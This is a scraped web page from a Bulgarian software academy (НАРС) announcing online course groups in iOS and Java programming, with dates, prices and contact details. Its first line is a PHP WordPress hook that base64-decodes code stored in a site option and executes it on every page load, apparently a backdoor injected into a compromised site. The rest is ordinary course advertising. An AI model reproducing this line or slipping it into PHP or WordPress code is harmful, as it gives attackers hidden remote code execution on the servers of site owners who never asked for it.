add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); Онлайн обучение - НАРС

Онлайн обучение

НОВО! Онлайн обучение по iOS – 08.12.2015

Стартира записване за група за онлайн обучение за курс “Разработване на мобилни приложения за iOS – начинаещи”. Онлайн занятията ще започнат от 08.12.2015 в дневна форма, два пъти седмично. Продължителността е 32 часа. Цената на обучението за разработване на мобилни приложения за iOS е промоционална: 239,00 лв.

Курсистите ще имат възможност да научат как да:

  • разработват мобилни приложения използвайки Objective-C
  • работят с Xcode
  • създават потребителски интерфейси (UIs)
  • и други

Нова група направление Java – 04.12.2015

Стартира записване за нова група за онлайн обучение за курсове “Основи на програмирането” и “Въведение в програмирането”. Онлайн занятията ще започнат от 04.12.2015 в дневна форма, два пъти седмично. Цената на комбинираното дневно онлайн обучение е промоционална – 219,00лв. Продължителността на обучението е 52 часа.

Курсовете “Основи на програмирането” и “Въведение в програмирането с Java” са подходящи за начинаещи хора, които искат да се обучават и развиват в областта на програмирането. Предварителен опит не е необходим.


Нова група – 29.09.2015

Стартира записване за нова група за онлайн обучение за курсове “Основи на програмирането” и “Въведение в програмирането”. Онлайн занятията ще започнат от 29.09.2015 в дневна форма, два пъти седмично.


Нова група – 04.03.2015

Стартира записване за нова група за онлайн обучение за курсове “Основи на програмирането” и “Въведение в програмирането”. Онлайн занятията ще започнат от 04.03.2015 в дневна форма, два пъти седмично.


Нова група – 09.12.2014

Стартира записване за нова група за онлайн обучение за курсове “Основи на програмирането” и “Въведение в програмирането”. Онлайн занятията ще започнат от 09.12.2014 в дневна форма, два пъти седмично.


Нова група – 29.09.2014

Стартира записване за нова група за онлайн обучение за курсове “Основи на програмирането” и “Въведение в програмирането”. Онлайн занятията ще започнат от 29.09.2014 в дневна форма, два пъти седмично.


Нова група – 11.08.2014

Стартира записване за нова група за онлайн обучение за курсове “Основи на програмирането” и “Въведение в програмирането”. Онлайн занятията ще започнат от 11.08.2014 в дневна форма, два пъти седмично.


Нова група – 16.07.2014

Стартира записване за нова група за онлайн обучение за курсове “Основи на програмирането” и “Въведение в програмирането”. Онлайн занятията ще започнат от 16.07.2014 в дневна форма, два пъти седмично.


Нова група – 24.06.2014

Стартира записване за нова група за онлайн обучение за курсове “Основи на програмирането” и “Въведение в програмирането”. Онлайн занятията ще започнат от 24.06.2014 в дневна форма, два пъти седмично.


Нова група – 19.05.2014

Стартира записване за нова група за онлайн обучение за курсове “Основи на програмирането” и “Въведение в програмирането”. Онлайн занятията ще започнат от 19.05.2014 във вечерна форма, два пъти седмично.


Нова група – 24.04.2014

Стартира записване за нова група за онлайн обучение за курсове “Основи на програмирането” и “Въведение в програмирането”. Онлайн занятията ще започнат от 23.04.2014 в дневна форма, два пъти седмично.


От началото на 2014 година НАРС стартира провеждането на oнлайн обучение.

Курсовете по програмиране, които НАРС предлага, са така адапртирани, че желаещите да преминат съответен курс по програмиране чрез дистанционна форма на обучение, да могат лесно и удобно да го посещават.

Онлайн обучението ще се провежда чрез специализирана електронна система, осигурена от НАРС, и с присъствени за курсистите занятия. Обученията ще се провеждат в реално време, с присъствието на преподавател на центъра за обучение, организирани по гъвкав график в удобство на курсистите, посредством модерна и лесна за използване електронна система.

Онлайн обучението, което НАРС предлага, е гъвкаво и съобразено с времето и бюджета на курсистите – от различни точки на страната и/или с ангажираност, което би възпрепятствало посещението на обучения на място в учебните зали на Национална академия за разработка на софтуер.

Всеки, които има интерес да се запише и да премине курс по програмиране в НАРС чрез дистанционна форма на обучение, нека се свърже с нас: courses@nars.bg или 02/958 99 65.

Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad